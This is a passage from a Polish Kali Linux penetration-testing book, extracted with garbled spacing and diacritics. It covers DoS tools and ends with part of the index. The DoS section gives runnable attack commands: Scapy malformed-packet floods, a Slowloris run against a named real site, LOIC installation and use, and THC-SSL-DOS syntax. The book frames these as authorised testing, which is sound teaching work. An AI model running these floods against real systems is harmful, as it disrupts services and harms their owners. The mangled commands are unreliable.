Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
